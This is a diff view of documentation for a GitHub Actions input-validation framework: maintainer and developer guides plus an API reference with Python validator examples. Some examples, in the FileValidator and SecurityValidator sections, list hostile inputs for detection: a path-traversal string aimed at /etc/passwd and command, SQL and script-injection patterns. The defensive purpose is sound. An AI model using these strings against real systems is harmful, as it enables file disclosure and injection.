INPUT_BUILD_MODE: ${{ inputs.build-mode }}
INPUT_SOURCE_ROOT: ${{ inputs.source-root }}
INPUT_CATEGORY: ${{ inputs.category }}
INPUT_CHECKOUT_REF: ${{ inputs.checkout-ref }}
INPUT_WORKING_DIRECTORY: ${{ inputs.working-directory }}
INPUT_UPLOAD_RESULTS: ${{ inputs.upload-results }}
INPUT_RAM: ${{ inputs.ram }}
INPUT_THREADS: ${{ inputs.threads }}
INPUT_OUTPUT: ${{ inputs.output }}
INPUT_SKIP_QUERIES: ${{ inputs.skip-queries }}
INPUT_ADD_SNIPPETS: ${{ inputs.add-snippets }}

526
validate-inputs/docs/ACTION_MAINTAINER.md Normal file
View File

@@ -0,0 +1,526 @@
# Action Maintainer Guide
## Overview
This guide helps action maintainers understand and use the validation system for their GitHub Actions.
## Table of Contents
1. [How Validation Works](#how-validation-works)
2. [Using Automatic Validation](#using-automatic-validation)
3. [Custom Validation](#custom-validation)
4. [Testing Your Validation](#testing-your-validation)
5. [Common Scenarios](#common-scenarios)
6. [Troubleshooting](#troubleshooting)
## How Validation Works
### Automatic Integration
Your action automatically gets input validation when using `validate-inputs`:
```yaml
# In your action.yml
runs:
using: composite
steps:
- name: Validate inputs
uses: ./validate-inputs
with:
action-type: ${{ github.action }}
```
### Validation Flow
1. **Input Collection**: All `INPUT_*` environment variables are collected
2. **Validator Selection**: System chooses appropriate validator
3. **Validation Execution**: Each input is validated
4. **Error Reporting**: Any errors are reported via `::error::`
5. **Status Output**: Results written to `GITHUB_OUTPUT`
## Using Automatic Validation
### Naming Conventions
Name your inputs to get automatic validation:
| Input Pattern | Validation Type | Example |
|----------------------|--------------------|----------------------------------|
| `*-token` | Token validation | `github-token`, `npm-token` |
| `*-version` | Version validation | `node-version`, `python-version` |
| `dry-run`, `verbose` | Boolean | `dry-run: true` |
| `max-*`, `*-limit` | Numeric range | `max-retries`, `rate-limit` |
| `*-file`, `*-path` | File path | `config-file`, `output-path` |
| `*-url`, `webhook-*` | URL validation | `api-url`, `webhook-endpoint` |
### Example Action
```yaml
name: My Action
description: Example action with automatic validation
inputs:
github-token: # Automatically validates GitHub token format
description: GitHub token for API access
required: true
default: ${{ github.token }}
node-version: # Automatically validates version format
description: Node.js version to use
required: false
default: '18'
max-retries: # Automatically validates numeric range
description: Maximum number of retries (1-10)
required: false
default: '3'
config-file: # Automatically validates file path
description: Configuration file path
required: false
default: '.config.yml'
dry-run: # Automatically validates boolean
description: Run in dry-run mode
required: false
default: 'false'
runs:
using: composite
steps:
- uses: ./validate-inputs
with:
action-type: ${{ github.action }}
- run: echo "Inputs validated successfully"
shell: bash
```
### Validation Rules File
After creating your action, generate validation rules:
```bash
# Generate rules for your action
make update-validators
# Or for a specific action
python3 validate-inputs/scripts/update-validators.py --action my-action
```
This creates `my-action/rules.yml`:
```yaml
schema_version: '1.0'
action: my-action
description: Example action with automatic validation
required_inputs:
- github-token
optional_inputs:
- node-version
- max-retries
- config-file
- dry-run
conventions:
github-token: github_token
node-version: semantic_version
max-retries: numeric_range_1_10
config-file: file_path
dry-run: boolean
```
## Custom Validation
### When to Use Custom Validation
Create a custom validator when:
- You have complex business logic
- Cross-field validation is needed
- Special format requirements exist
- Default validation is insufficient
### Creating a Custom Validator
1. **Create `CustomValidator.py`** in your action directory:
```python
#!/usr/bin/env python3
"""Custom validator for my-action."""
from __future__ import annotations
from pathlib import Path
import sys
# Add validate-inputs to path
validate_inputs_path = Path(__file__).parent.parent / "validate-inputs"
sys.path.insert(0, str(validate_inputs_path))
from validators.base import BaseValidator
from validators.version import VersionValidator
class CustomValidator(BaseValidator):
"""Custom validator for my-action."""
def __init__(self, action_type: str = "my-action") -> None:
super().__init__(action_type)
self.version_validator = VersionValidator(action_type)
def validate_inputs(self, inputs: dict[str, str]) -> bool:
valid = True
# Check required inputs
valid &= self.validate_required_inputs(inputs)
# Custom validation
if inputs.get("environment"):
valid &= self.validate_environment(inputs["environment"])
# Cross-field validation
if inputs.get("environment") == "production":
if not inputs.get("approval-required"):
self.add_error(
"Production deployments require approval-required=true"
)
valid = False
return valid
def get_required_inputs(self) -> list[str]:
return ["environment", "target"]
def validate_environment(self, env: str) -> bool:
valid_envs = ["development", "staging", "production"]
if env not in valid_envs:
self.add_error(
f"Invalid environment: {env}. "
f"Must be one of: {', '.join(valid_envs)}"
)
return False
return True
def get_validation_rules(self) -> dict:
"""Get validation rules."""
rules_path = Path(__file__).parent / "rules.yml"
return self.load_rules(rules_path)
```
1. **Test your validator** (optional but recommended):
```python
# my-action/test_custom_validator.py
from CustomValidator import CustomValidator
def test_valid_inputs():
validator = CustomValidator()
inputs = {
"environment": "production",
"target": "app-server",
"approval-required": "true"
}
assert validator.validate_inputs(inputs) is True
assert len(validator.errors) == 0
```
## Testing Your Validation
### Manual Testing
```bash
# Test with environment variables
export INPUT_ACTION_TYPE="my-action"
export INPUT_GITHUB_TOKEN="${{ secrets.GITHUB_TOKEN }}"
export INPUT_NODE_VERSION="18.0.0"
export INPUT_DRY_RUN="true"
python3 validate-inputs/validator.py
```
### Integration Testing
Create a test workflow:
```yaml
# .github/workflows/test-my-action.yml
name: Test My Action Validation
on:
pull_request:
paths:
- 'my-action/**'
- 'validate-inputs/**'
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
# Test valid inputs
- name: Test with valid inputs
uses: ./my-action
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
node-version: '18.0.0'
dry-run: 'true'
# Test invalid inputs (should fail)
- name: Test with invalid inputs
id: invalid
continue-on-error: true
uses: ./my-action
with:
github-token: 'invalid-token'
node-version: 'not-a-version'
dry-run: 'maybe'
- name: Check failure
if: steps.invalid.outcome != 'failure'
run: exit 1
```
### Generating Tests
Use the test generator:
```bash
# Generate tests for your action
make generate-tests
# Preview what would be generated
make generate-tests-dry
# Run the generated tests
make test
```
## Common Scenarios
### Scenario 1: Required Inputs
```yaml
inputs:
api-key:
description: API key for service
required: true # No default value
```
Validation automatically enforces this requirement.
### Scenario 2: Dependent Inputs
Use custom validator for dependent fields:
```python
def validate_inputs(self, inputs: dict[str, str]) -> bool:
# If using custom registry, token is required
if inputs.get("registry") and not inputs.get("registry-token"):
self.add_error("registry-token required when using custom registry")
return False
return True
```
### Scenario 3: Complex Formats
```python
def validate_cron_schedule(self, schedule: str) -> bool:
"""Validate cron schedule format."""
import re
# Simple cron pattern (not exhaustive)
pattern = r'^(\*|[0-9,\-\*/]+)\s+(\*|[0-9,\-\*/]+)\s+(\*|[0-9,\-\*/]+)\s+(\*|[0-9,\-\*/]+)\s+(\*|[0-9,\-\*/]+)$'
if not re.match(pattern, schedule):
self.add_error(f"Invalid cron schedule: {schedule}")
return False
return True
```
### Scenario 4: External Service Validation
```python
def validate_docker_image_exists(self, image: str) -> bool:
"""Check if Docker image exists (example)."""
# Note: Be careful with external calls in validation
# Consider caching or making this optional
# Allow GitHub Actions expressions
if self.is_github_expression(image):
return True
# Simplified check - real implementation would need error handling
import subprocess
result = subprocess.run(
["docker", "manifest", "inspect", image],
capture_output=True,
text=True
)
if result.returncode != 0:
self.add_error(f"Docker image not found: {image}")
return False
return True
```
## Troubleshooting
### Issue: Validation Not Running
**Check**:
1. Is `validate-inputs` action called in your workflow?
2. Is `action-type` parameter set correctly?
3. Are environment variables prefixed with `INPUT_`?
**Debug**:
```yaml
- name: Debug inputs
run: |
env | grep INPUT_ | sort
shell: bash
- uses: ./validate-inputs
with:
action-type: ${{ github.action }}
```
### Issue: Custom Validator Not Found
**Check**:
1. Is `CustomValidator.py` in action directory?
2. Is class named exactly `CustomValidator`?
3. Is file readable and valid Python?
**Debug**:
```bash
# Test import directly
python3 -c "from my_action.CustomValidator import CustomValidator; print('Success')"
```
### Issue: Validation Too Strict
**Solutions**:
1. **Allow GitHub expressions**:
```python
if self.is_github_expression(value):
return True
```
1. **Make fields optional**:
```python
if not value or not value.strip():
return True # Empty is OK for optional fields
```
1. **Add to allowed values**:
```python
valid_values = ["option1", "option2", "custom"] # Add more options
```
### Issue: Validation Not Strict Enough
**Solutions**:
1. **Create custom validator** with stricter rules
2. **Add pattern matching**:
```python
import re
if not re.match(r'^[a-z0-9\-]+$', value):
self.add_error("Only lowercase letters, numbers, and hyphens allowed")
```
1. **Add length limits**:
```python
if len(value) > 100:
self.add_error("Value too long (max 100 characters)")
```
### Getting Validation Status
Access validation results in subsequent steps:
```yaml
- uses: ./validate-inputs
id: validation
with:
action-type: my-action
- name: Check validation status
run: |
echo "Status: ${{ steps.validation.outputs.status }}"
echo "Valid: ${{ steps.validation.outputs.valid }}"
echo "Action: ${{ steps.validation.outputs.action }}"
echo "Inputs validated: ${{ steps.validation.outputs.inputs_validated }}"
shell: bash
```
### Debugging Validation Errors
Enable debug output:
```yaml
- uses: ./validate-inputs
with:
action-type: my-action
env:
ACTIONS_RUNNER_DEBUG: true
ACTIONS_STEP_DEBUG: true
```
View specific errors:
```bash
# In your action
- name: Validate
id: validate
uses: ./validate-inputs
continue-on-error: true
with:
action-type: my-action
- name: Show errors
if: steps.validate.outcome == 'failure'
run: |
echo "Validation failed!"
# Errors are already shown via ::error::
shell: bash
```
## Best Practices
1. **Use conventions** when possible for automatic validation
2. **Document validation rules** in your action's README
3. **Test with invalid inputs** to ensure validation works
4. **Allow GitHub expressions** (`${{ }}`) in all validators
5. **Provide clear error messages** that explain how to fix the issue
6. **Make validation fast** - avoid expensive operations
7. **Cache validation results** if checking external resources
8. **Version your validation** - use `validate-inputs@v1` etc.
9. **Monitor validation failures** in your action's usage
## Resources
- [API Documentation](./API.md) - Complete validator API reference
- [Developer Guide](./DEVELOPER_GUIDE.md) - Adding new validators
- [Test Generator](../scripts/generate-tests.py) - Automatic test creation
- [Rule Generator](../scripts/update-validators.py) - Rule file generation
## Support
For validation issues:
1. Check error messages for specific problems
2. Review validation rules in action folder's `rules.yml`
3. Test with simplified inputs
4. Create custom validator if needed
5. Report bugs via GitHub Issues

447
validate-inputs/docs/API.md Normal file
View File

@@ -0,0 +1,447 @@
# Validator API Documentation
## Table of Contents
1. [Base Validator](#base-validator)
2. [Core Validators](#core-validators)
3. [Registry System](#registry-system)
4. [Custom Validators](#custom-validators)
5. [Conventions](#conventions)
## Base Validator
### `BaseValidator`
The abstract base class for all validators. Provides common functionality for validation, error handling, and rule loading.
```python
from validators.base import BaseValidator
class MyValidator(BaseValidator):
def validate_inputs(self, inputs: dict[str, str]) -> bool:
# Implementation
pass
```
#### Methods
| Method | Description | Returns |
|-------------------------------------------------|---------------------------------------|-------------|
| `validate_inputs(inputs)` | Main validation entry point | `bool` |
| `validate_required_inputs(inputs)` | Validates required inputs are present | `bool` |
| `validate_path_security(path)` | Checks for path traversal attacks | `bool` |
| `validate_security_patterns(value, field_name)` | Checks for injection attacks | `bool` |
| `add_error(message)` | Adds an error message | `None` |
| `clear_errors()` | Clears all error messages | `None` |
| `get_required_inputs()` | Returns list of required input names | `list[str]` |
| `get_validation_rules()` | Returns validation rules dictionary | `dict` |
| `load_rules(action_type)` | Loads rules from YAML file | `dict` |
#### Properties
| Property | Type | Description |
|---------------|-------------|---------------------------------|
| `errors` | `list[str]` | Accumulated error messages |
| `action_type` | `str` | The action type being validated |
## Core Validators
### `BooleanValidator`
Validates boolean inputs with flexible string representations.
```python
from validators.boolean import BooleanValidator
validator = BooleanValidator()
validator.validate_boolean("true", "dry-run") # Returns True
validator.validate_boolean("yes", "dry-run") # Returns False (not allowed)
```
**Accepted Values**: `true`, `false`, `True`, `False`, `TRUE`, `FALSE`
### `VersionValidator`
Validates version strings in multiple formats.
```python
from validators.version import VersionValidator
validator = VersionValidator()
validator.validate_semantic_version("1.2.3") # SemVer
validator.validate_calver("2024.3.15") # CalVer
validator.validate_flexible_version("v1.2.3") # Either format
```
**Supported Formats**:
- **SemVer**: `1.2.3`, `1.0.0-alpha`, `2.1.0+build123`
- **CalVer**: `2024.3.1`, `2024.03.15`, `24.3.1`
- **Prefixed**: `v1.2.3`, `v2024.3.1`
### `TokenValidator`
Validates authentication tokens for various services.
```python
from validators.token import TokenValidator
validator = TokenValidator()
validator.validate_github_token("ghp_...") # Classic PAT
validator.validate_github_token("github_pat_...") # Fine-grained PAT
validator.validate_github_token("${{ secrets.GITHUB_TOKEN }}") # Expression
```
**Token Types**:
- **GitHub**: `ghp_`, `gho_`, `ghu_`, `ghs_`, `ghr_`, `github_pat_`
- **NPM**: UUID format, `${{ secrets.NPM_TOKEN }}`
- **Docker**: Any non-empty value
### `NumericValidator`
Validates numeric values and ranges.
```python
from validators.numeric import NumericValidator
validator = NumericValidator()
validator.validate_numeric_range("5", 0, 10) # Within range
validator.validate_numeric_range("15", 0, 10) # Out of range (fails)
```
**Common Ranges**:
- `0-100`: Percentages
- `1-10`: Retry counts
- `1-128`: Thread/worker counts
### `FileValidator`
Validates file paths with security checks.
```python
from validators.file import FileValidator
validator = FileValidator()
validator.validate_file_path("./config.yml") # Valid
validator.validate_file_path("../../../etc/passwd") # Path traversal (fails)
validator.validate_file_path("/absolute/path") # Absolute path (fails)
```
**Security Checks**:
- No path traversal (`../`)
- No absolute paths
- No special characters that could cause injection
### `NetworkValidator`
Validates network-related inputs.
```python
from validators.network import NetworkValidator
validator = NetworkValidator()
validator.validate_url("https://example.com")
validator.validate_email("user@example.com")
validator.validate_hostname("api.example.com")
validator.validate_ip_address("192.168.1.1")
```
**Validation Types**:
- **URLs**: HTTP/HTTPS with valid structure
- **Emails**: RFC-compliant email addresses
- **Hostnames**: Valid DNS names
- **IPs**: IPv4 and IPv6 addresses
- **Ports**: 1-65535 range
### `DockerValidator`
Validates Docker-specific inputs.
```python
from validators.docker import DockerValidator
validator = DockerValidator()
validator.validate_image_name("nginx")
validator.validate_tag("latest")
validator.validate_architectures("linux/amd64,linux/arm64")
validator.validate_registry("ghcr.io")
```
**Docker Validations**:
- **Images**: Lowercase, alphanumeric with `-`, `_`, `/`
- **Tags**: Alphanumeric with `-`, `_`, `.`
- **Platforms**: Valid OS/architecture combinations
- **Registries**: Known registries or valid hostnames
### `SecurityValidator`
Performs security-focused validations.
```python
from validators.security import SecurityValidator
validator = SecurityValidator()
validator.validate_no_injection("safe input")
validator.validate_safe_command("echo hello")
validator.validate_safe_environment_variable("PATH=/usr/bin")
validator.validate_no_secrets("normal text")
```
**Security Patterns Detected**:
- Command injection: `;`, `&&`, `||`, `` ` ``, `$()`
- SQL injection: `' OR '1'='1`, `DROP TABLE`, `--`
- Path traversal: `../`, `..\\`
- Script injection: `<script>`, `javascript:`
- Secrets: API keys, tokens, passwords
### `CodeQLValidator`
Validates CodeQL-specific inputs.
```python
from validators.codeql import CodeQLValidator
validator = CodeQLValidator()
validator.validate_languages(["javascript", "python"])
validator.validate_codeql_queries(["security", "quality"])
validator.validate_codeql_config("./codeql-config.yml")
```
**Supported Languages**: JavaScript, TypeScript, Python, Java, C#, C/C++, Go, Ruby, Kotlin, Swift
## Registry System
### `ValidatorRegistry`
Manages validator discovery and caching.
```python
from validators.registry import ValidatorRegistry
registry = ValidatorRegistry()
validator = registry.get_validator("docker-build") # Gets appropriate validator
```
#### Methods
| Method | Description | Returns |
|---------------------------------------------|---------------------------|-----------------|
| `get_validator(action_type)` | Gets validator for action | `BaseValidator` |
| `register_validator(name, validator_class)` | Registers a validator | `None` |
| `clear_cache()` | Clears validator cache | `None` |
### `ConventionBasedValidator`
Automatically selects validators based on input naming conventions.
```python
from validators.conventions import ConventionBasedValidator
validator = ConventionBasedValidator("my-action")
validator.validate_inputs({
"github-token": "ghp_...", # Uses TokenValidator
"version": "1.2.3", # Uses VersionValidator
"dry-run": "true", # Uses BooleanValidator
"max-retries": "5" # Uses NumericValidator
})
```
## Custom Validators
Custom validators extend the base functionality for specific actions.
### Creating a Custom Validator
1. Create `CustomValidator.py` in your action directory:
```python
from pathlib import Path
import sys
# Add validate-inputs to path
validate_inputs_path = Path(__file__).parent.parent / "validate-inputs"
sys.path.insert(0, str(validate_inputs_path))
from validators.base import BaseValidator
from validators.docker import DockerValidator
class CustomValidator(BaseValidator):
def __init__(self, action_type: str = "my-action") -> None:
super().__init__(action_type)
self.docker_validator = DockerValidator(action_type)
def validate_inputs(self, inputs: dict[str, str]) -> bool:
valid = True
# Validate required inputs
valid &= self.validate_required_inputs(inputs)
# Custom validation logic
if inputs.get("special-field"):
valid &= self.validate_special_field(inputs["special-field"])
return valid
def get_required_inputs(self) -> list[str]:
return ["special-field", "another-required"]
def validate_special_field(self, value: str) -> bool:
# Custom validation logic
if not value.startswith("special-"):
self.add_error(f"Special field must start with 'special-': {value}")
return False
return True
```
### Error Propagation
When using sub-validators, propagate their errors:
```python
result = self.docker_validator.validate_image_name(image_name, "image")
if not result:
for error in self.docker_validator.errors:
if error not in self.errors:
self.add_error(error)
self.docker_validator.clear_errors()
```
## Conventions
### Input Naming Conventions
The system automatically detects validation types based on input names:
| Pattern | Validator | Example |
|-------------------------------|------------------|----------------------------------|
| `*-token` | TokenValidator | `github-token`, `npm-token` |
| `*-version` | VersionValidator | `node-version`, `dotnet-version` |
| `dry-run`, `debug`, `verbose` | BooleanValidator | `dry-run`, `skip-tests` |
| `*-retries`, `*-limit` | NumericValidator | `max-retries`, `rate-limit` |
| `*-file`, `*-path` | FileValidator | `config-file`, `output-path` |
| `*-url`, `webhook-*` | NetworkValidator | `api-url`, `webhook-endpoint` |
| `*-email` | NetworkValidator | `maintainer-email` |
| `dockerfile` | FileValidator | `dockerfile` |
| `image-*`, `tag`, `platform` | DockerValidator | `image-name`, `tag` |
### GitHub Expression Support
All validators support GitHub Actions expressions:
```python
validator.validate_inputs({
"token": "${{ secrets.GITHUB_TOKEN }}",
"version": "${{ github.event.release.tag_name }}",
"dry-run": "${{ github.event_name == 'pull_request' }}"
})
```
Expressions containing `${{` are automatically considered valid.
## Error Handling
### Error Messages
Error messages should be:
- Clear and actionable
- Include the invalid value
- Suggest the correct format
```python
self.add_error(f"Invalid version format: {value}. Expected SemVer (1.2.3) or CalVer (2024.3.1)")
```
### Error Collection
Validators collect all errors before returning:
```python
def validate_inputs(self, inputs: dict[str, str]) -> bool:
valid = True
# Check multiple conditions
if not self.validate_field1(inputs.get("field1")):
valid = False
if not self.validate_field2(inputs.get("field2")):
valid = False
# Return False only after checking everything
return valid
```
## Performance Considerations
### Caching
The registry caches validator instances:
```python
registry = ValidatorRegistry()
validator1 = registry.get_validator("docker-build") # Creates new
validator2 = registry.get_validator("docker-build") # Returns cached
assert validator1 is validator2 # Same instance
```
### Lazy Loading
Validators are loaded only when needed:
```python
# Only loads DockerValidator if docker-related inputs exist
validator = ConventionBasedValidator("my-action")
validator.validate_inputs(inputs) # Loads validators on demand
```
## Testing Validators
### Unit Testing
```python
import pytest
from validators.version import VersionValidator
def test_version_validation():
validator = VersionValidator()
# Test valid versions
assert validator.validate_semantic_version("1.2.3", "version")
assert validator.validate_calver("2024.3.1", "version")
# Test invalid versions
assert not validator.validate_semantic_version("invalid", "version")
assert len(validator.errors) > 0
```
### Integration Testing
```python
def test_custom_validator():
validator = CustomValidator("my-action")
inputs = {
"special-field": "special-value",
"another-required": "test"
}
assert validator.validate_inputs(inputs)
assert len(validator.errors) == 0
```
## Best Practices
1. **Always validate required inputs first**
2. **Use sub-validators for standard validations**
3. **Propagate errors from sub-validators**
4. **Support GitHub expressions**
5. **Provide clear, actionable error messages**
6. **Test both valid and invalid inputs**
7. **Document custom validation rules**
8. **Follow naming conventions for automatic detection**

617
validate-inputs/docs/DEVELOPER_GUIDE.md Normal file
View File

@@ -0,0 +1,617 @@
# Developer Guide - Adding New Validators
## Table of Contents
1. [Quick Start](#quick-start)
2. [Creating a Core Validator](#creating-a-core-validator)
3. [Creating a Custom Validator](#creating-a-custom-validator)
4. [Adding Convention Patterns](#adding-convention-patterns)
5. [Writing Tests](#writing-tests)
6. [Debugging](#debugging)
7. [Common Patterns](#common-patterns)
## Quick Start
### Adding validation for a new input type
1. **Check if existing validator covers it**:
```bash
# Search for similar validation patterns
grep -r "validate_.*" validate-inputs/validators/
```
2. **Use convention-based detection** (easiest):
- Name your input following conventions (e.g., `my-token`, `api-version`)
- System automatically uses appropriate validator
3. **Create custom validator** (for complex logic):
```bash
# Create CustomValidator.py in your action directory
touch my-action/CustomValidator.py
```
## Creating a Core Validator
### Step 1: Create the Validator File
Create `validate-inputs/validators/mytype.py`:
```python
"""Validator for MyType inputs."""
from __future__ import annotations
import re
from typing import Any
from .base import BaseValidator
class MyTypeValidator(BaseValidator):
"""Validates MyType-specific inputs."""
def __init__(self, action_type: str = "") -> None:
"""Initialize the MyType validator."""
super().__init__(action_type)
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate MyType inputs based on conventions.
Args:
inputs: Dictionary of input names to values
Returns:
True if all validations pass, False otherwise
"""
valid = True
for input_name, value in inputs.items():
# Check if this input should be validated by this validator
if self._should_validate(input_name):
if not self.validate_mytype(value, input_name):
valid = False
return valid
def _should_validate(self, input_name: str) -> bool:
"""Check if input should be validated by this validator."""
# Define patterns that trigger this validator
patterns = [
"mytype",
"-mytype",
"mytype-",
]
name_lower = input_name.lower()
return any(pattern in name_lower for pattern in patterns)
def validate_mytype(self, value: str, field_name: str) -> bool:
"""Validate a MyType value.
Args:
value: The value to validate
field_name: Name of the field being validated
Returns:
True if valid, False otherwise
"""
# Allow empty for optional fields
if not value or not value.strip():
return True
# Allow GitHub Actions expressions
if self.is_github_expression(value):
return True
# Your validation logic here
pattern = r"^mytype-[a-z0-9]+$"
if not re.match(pattern, value):
self.add_error(
f"Invalid MyType format for '{field_name}': {value}. "
f"Expected format: mytype-xxxxx"
)
return False
return True
```
### Step 2: Register the Validator
Add to `validate-inputs/validators/__init__.py`:
```python
from .mytype import MyTypeValidator
__all__ = [
# ... existing validators ...
"MyTypeValidator",
]
```
### Step 3: Add Convention Patterns
Update `validate-inputs/validators/conventions.py`:
```python
# In ConventionBasedValidator.PATTERNS dict:
PATTERNS = {
# Exact matches (highest priority)
"exact": {
# ... existing patterns ...
"mytype-config": "mytype",
},
# Prefix patterns
"prefix": {
# ... existing patterns ...
"mytype-": "mytype",
},
# Suffix patterns
"suffix": {
# ... existing patterns ...
"-mytype": "mytype",
},
}
# In get_validator_class method:
validator_map = {
# ... existing mappings ...
"mytype": MyTypeValidator,
}
```
## Creating a Custom Validator
### For Complex Action-Specific Logic
Create `my-action/CustomValidator.py`:
```python
"""Custom validator for my-action.
This validator handles complex validation logic specific to my-action.
"""
from __future__ import annotations
from pathlib import Path
import sys
# Add validate-inputs directory to path
validate_inputs_path = Path(__file__).parent.parent / "validate-inputs"
sys.path.insert(0, str(validate_inputs_path))
from validators.base import BaseValidator
from validators.version import VersionValidator
from validators.token import TokenValidator
class CustomValidator(BaseValidator):
"""Custom validator for my-action."""
def __init__(self, action_type: str = "my-action") -> None:
"""Initialize the custom validator."""
super().__init__(action_type)
# Initialize sub-validators
self.version_validator = VersionValidator(action_type)
self.token_validator = TokenValidator(action_type)
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate my-action specific inputs.
Args:
inputs: Dictionary of input names to values
Returns:
True if all validations pass, False otherwise
"""
valid = True
# Validate required inputs
valid &= self.validate_required_inputs(inputs)
# Use sub-validators
if inputs.get("api-token"):
if not self.token_validator.validate_github_token(
inputs["api-token"], "api-token"
):
# Propagate errors
for error in self.token_validator.errors:
if error not in self.errors:
self.add_error(error)
self.token_validator.clear_errors()
valid = False
# Custom validation logic
if inputs.get("mode"):
valid &= self.validate_mode(inputs["mode"])
# Cross-field validation
if inputs.get("source") and inputs.get("target"):
valid &= self.validate_source_target(
inputs["source"],
inputs["target"]
)
return valid
def get_required_inputs(self) -> list[str]:
"""Get list of required inputs.
Returns:
List of required input names
"""
return ["api-token", "mode"]
def validate_mode(self, mode: str) -> bool:
"""Validate operation mode.
Args:
mode: The mode value
Returns:
True if valid, False otherwise
"""
valid_modes = ["development", "staging", "production"]
if mode not in valid_modes:
self.add_error(
f"Invalid mode: {mode}. "
f"Must be one of: {', '.join(valid_modes)}"
)
return False
return True
def validate_source_target(self, source: str, target: str) -> bool:
"""Validate source and target relationship.
Args:
source: Source value
target: Target value
Returns:
True if valid, False otherwise
"""
if source == target:
self.add_error("Source and target cannot be the same")
return False
return True
```
## Adding Convention Patterns
### Pattern Priority
Patterns are checked in this order:
1. **Exact match** (highest priority)
2. **Prefix match** (`token-*`)
3. **Suffix match** (`*-token`)
4. **Contains match** (lowest priority)
### Adding a New Pattern
```python
# In validate-inputs/validators/conventions.py
# For automatic token validation of "api-key" inputs:
PATTERNS = {
"exact": {
"api-key": "token", # Maps api-key to TokenValidator
},
}
# For all inputs ending with "-secret":
PATTERNS = {
"suffix": {
"-secret": "security", # Maps to SecurityValidator
},
}
```
## Writing Tests
### Core Validator Tests
Create `validate-inputs/tests/test_mytype.py`:
```python
"""Tests for MyTypeValidator."""
import pytest
from validators.mytype import MyTypeValidator
class TestMyTypeValidator:
"""Test MyTypeValidator functionality."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = MyTypeValidator("test-action")
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.action_type == "test-action"
assert self.validator.errors == []
def test_valid_mytype(self):
"""Test valid MyType values."""
valid_cases = [
"mytype-abc123",
"mytype-test",
"${{ secrets.MYTYPE }}", # GitHub expression
"", # Empty allowed
]
for value in valid_cases:
self.validator.clear_errors()
result = self.validator.validate_mytype(value, "test")
assert result is True, f"Failed for: {value}"
assert len(self.validator.errors) == 0
def test_invalid_mytype(self):
"""Test invalid MyType values."""
invalid_cases = [
("invalid", "Invalid MyType format"),
("mytype-", "Invalid MyType format"),
("MYTYPE-123", "Invalid MyType format"), # Uppercase
]
for value, expected_error in invalid_cases:
self.validator.clear_errors()
result = self.validator.validate_mytype(value, "test")
assert result is False, f"Should fail for: {value}"
assert any(
expected_error in error
for error in self.validator.errors
)
def test_validate_inputs(self):
"""Test full input validation."""
inputs = {
"mytype-field": "mytype-valid",
"other-field": "ignored",
}
result = self.validator.validate_inputs(inputs)
assert result is True
assert len(self.validator.errors) == 0
```
### Custom Validator Tests
Create `my-action/test_custom_validator.py`:
```python
"""Tests for my-action CustomValidator."""
import sys
from pathlib import Path
# Add parent to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from my_action.CustomValidator import CustomValidator
def test_custom_validator():
"""Test custom validation logic."""
validator = CustomValidator()
# Test valid inputs
inputs = {
"api-token": "${{ secrets.GITHUB_TOKEN }}",
"mode": "production",
"source": "dev",
"target": "prod",
}
assert validator.validate_inputs(inputs) is True
assert len(validator.errors) == 0
# Test invalid mode
validator.clear_errors()
inputs["mode"] = "invalid"
assert validator.validate_inputs(inputs) is False
assert "Invalid mode" in str(validator.errors)
```
### Using Test Generator
Generate test scaffolding automatically:
```bash
# Generate missing tests
make generate-tests
# Preview what would be generated
make generate-tests-dry
# Test specific action
python3 validate-inputs/scripts/generate-tests.py --action my-action
```
## Debugging
### Enable Debug Output
```python
import logging
# In your validator
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
class MyValidator(BaseValidator):
def validate_mytype(self, value: str, field_name: str) -> bool:
logger.debug(f"Validating {field_name}: {value}")
# ... validation logic ...
```
### Test Validator Directly
```python
#!/usr/bin/env python3
"""Debug validator directly."""
from validators.mytype import MyTypeValidator
validator = MyTypeValidator("debug")
result = validator.validate_mytype("test-value", "field")
print(f"Valid: {result}")
print(f"Errors: {validator.errors}")
```
### Check Convention Matching
```python
from validators.conventions import ConventionBasedValidator
validator = ConventionBasedValidator("test")
mapper = validator.convention_mapper
# Check what validator would be used
validator_type = mapper.get_validator_type("my-field-name")
print(f"Would use: {validator_type}")
```
## Common Patterns
### Pattern 1: Composing Validators
```python
class CustomValidator(BaseValidator):
def __init__(self, action_type: str) -> None:
super().__init__(action_type)
# Compose multiple validators
self.token_val = TokenValidator(action_type)
self.version_val = VersionValidator(action_type)
self.docker_val = DockerValidator(action_type)
```
### Pattern 2: Error Propagation
```python
def validate_inputs(self, inputs: dict[str, str]) -> bool:
# Use sub-validator
result = self.docker_val.validate_image_name(
inputs["image"], "image"
)
if not result:
# Propagate errors
for error in self.docker_val.errors:
if error not in self.errors:
self.add_error(error)
self.docker_val.clear_errors()
return False
```
### Pattern 3: GitHub Expression Support
```python
def validate_field(self, value: str, field_name: str) -> bool:
# Allow GitHub Actions expressions
if self.is_github_expression(value):
return True
# Your validation logic
# ...
```
### Pattern 4: Optional vs Required
```python
def validate_field(self, value: str, field_name: str) -> bool:
# Allow empty for optional fields
if not value or not value.strip():
return True
# Validate non-empty values
# ...
```
### Pattern 5: Security Checks
```python
def validate_input(self, value: str, field_name: str) -> bool:
# Always check for injection attempts
if not self.validate_security_patterns(value, field_name):
return False
# Your validation logic
# ...
```
## Performance Tips
1. **Cache Regex Patterns**:
```python
class MyValidator(BaseValidator):
# Compile once at class level
PATTERN = re.compile(r"^mytype-[a-z0-9]+$")
def validate_mytype(self, value: str, field_name: str) -> bool:
if not self.PATTERN.match(value):
# ...
```
2. **Lazy Load Sub-Validators**:
```python
@property
def docker_validator(self):
if not hasattr(self, "_docker_validator"):
self._docker_validator = DockerValidator(self.action_type)
return self._docker_validator
```
3. **Early Returns**:
```python
def validate_inputs(self, inputs: dict[str, str]) -> bool:
# Check required inputs first
if not self.validate_required_inputs(inputs):
return False # Exit early
# Continue with other validations
# ...
```
## Checklist for New Validators
- [ ] Create validator class extending `BaseValidator`
- [ ] Implement `validate_inputs` method
- [ ] Add to `__init__.py` exports
- [ ] Add convention patterns if applicable
- [ ] Write comprehensive tests
- [ ] Test with GitHub expressions (`${{ }}`)
- [ ] Test with empty/whitespace values
- [ ] Document validation rules
